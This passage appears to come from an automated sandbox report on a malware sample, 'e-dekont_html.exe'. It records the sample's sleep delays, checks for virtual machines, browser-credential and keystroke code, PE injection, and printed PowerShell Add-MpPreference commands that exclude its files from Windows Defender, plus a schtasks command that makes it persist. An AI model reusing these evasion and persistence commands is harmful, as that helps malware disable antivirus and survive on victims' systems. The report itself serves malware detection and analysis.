                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598402s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598183s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -598078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597731s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597582s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597233s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -597016s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596797s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596688s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596563s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -596110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595860s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595735s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595326s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -595206s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594746s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -594078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -593969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe TID: 7792Thread sleep time: -593839s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599668Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599124Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598897Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598660Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598406Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598292Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598187Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597969Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597665Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597494Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597344Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597016Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596766Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596656Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596547Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596437Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596328Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596219Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596000Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595766Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595641Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595422Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594930Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594652Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594540Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594312Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594203Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594094Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593983Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593875Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599654
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 599094
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598984
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598875
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598765
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598656
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598402
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598183
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 598078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597953
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597844
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597731
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597582
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597233
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597125
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 597016
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596906
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596797
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596688
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596563
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595326
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 595206
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594746
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594641
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594516
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594406
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594187
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 594078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 593969
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeThread delayed: delay time: 593839
                Source: e-dekont_html.exe, 00000000.00000002.1778649683.0000000008C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: e-dekont_html.exe, 00000008.00000002.4158801476.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4160104239.0000000001678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory written: C:\Users\user\Desktop\e-dekont_html.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeMemory written: C:\Users\user\AppData\Roaming\fahKSvwo.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeProcess created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
